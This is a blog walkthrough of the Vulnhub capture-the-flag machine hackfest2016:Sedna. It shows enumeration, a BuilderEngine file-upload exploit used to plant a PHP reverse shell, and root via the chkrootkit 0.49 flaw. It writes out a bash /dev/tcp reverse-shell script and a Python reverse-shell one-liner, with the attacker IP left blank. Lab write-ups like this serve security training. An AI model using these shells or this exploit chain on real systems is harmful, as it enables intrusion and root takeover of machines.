Tuesday, 23 May 2017

Vulnhub - hackfest2016:Sedna Walkthrough


To begin with, I ran nmap to identify the services running on the box.

Now we have some more information to start with and first target will be HTTP Services (80 and 8080). Our best friend Nikto gave us some vital information:

And HTTP service running on port 8080:

We have some more vital information, lets concentrate on port 80 first and then we will come back to 8080 later. We have identified that Apache 2.4.7 is running on the box and we can see "license.txt" file and it reveals that BuilderEngine is running. However, we still don't know what version it is running, lets enumerate bit more.

Nice! Few more directories, and this time the file "description.txt" revealed that BuilderEngine Version 3 is installed.


Going for the kill - Flag 1

To get the limited shell, we will be exploiting the BuilderEngine Arbitrary File Upload vulnerability to upload a shell. Exploit and PoC can be found here.
To upload a php shell (ensure you change IP and Port in the web shell so the shell comes back to you, I used port 443) we will use the POST method as explained in the exploit. 
Firing up firefox and launching the page will present us with the form to upload files, here we will upload our shell. 
Once we have uploaded the shell, we can find our shell in http://<targe ip>/files/.

We will start our netcat listener on port 443 and click the "php-reverse-shell.php" to execute our webshell. 

Bingo! we have the shell, to get the firs flag we will cd into "/var/www" to get the flag. 

Rooting the box - Flag 2

After exhausting the list of kernel exploits on searchsploit for Ubuntu 14.04 and kernel 13.3.0-32, I decided to do more enumerations I found out chkrootkit is installed on the machine. To our luck version 0.49 is installed. 

Searching on searchsploit we have found an exploit for chkrootkit version 0.49. As per the vulnerability  chkrootkit will execute all the files with root privileges. We will now create a bash script for reverse shell and wget into "tmp" folder:

#! /bin/bash
bash -i >& /dev/tcp/ 0>&1

Once the script is ready, we will wget the script into the "tmp" directory and make it executable. 

Now we will start the listener on port 445 on our attacker machine and wait for the file to execute and send the reverse shell. 

w00t w00t! we have a root shell. However, there is a little bit of a problem. The shell we have got have some tty issue. To tackle with this, I will start another listener on port 8000 and use python one-liner reverse shell. 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

There we go! we have a stable root shell and 2nd flag. 

Post exploitation - Flag 3

For flag 3, I did bit more enumerations, and as per nmap results I know that tomcat is running on port 8080. So further enumeration revealed tomcat manager's username and password is stored in file "tomcat-users.xml" in directory "/etc/tomcat7", which is in actual the 3rd flag.

I have enumerated to identify the 4th flag, to get the 4th flag I needed to crack a user's password. I have tried John as well as tried using bruteforce the user using ssh, but no luck. I'd be interested to see if someone actually cracked the password.  

No comments:

Post a Comment

Exploiting Windows 7 Machine Using EternalBlue and DoublePulsar

Introduction This the the demo I have created to understand how MS17-010 is exploited on windows 7 machine. This demo is based on the pa...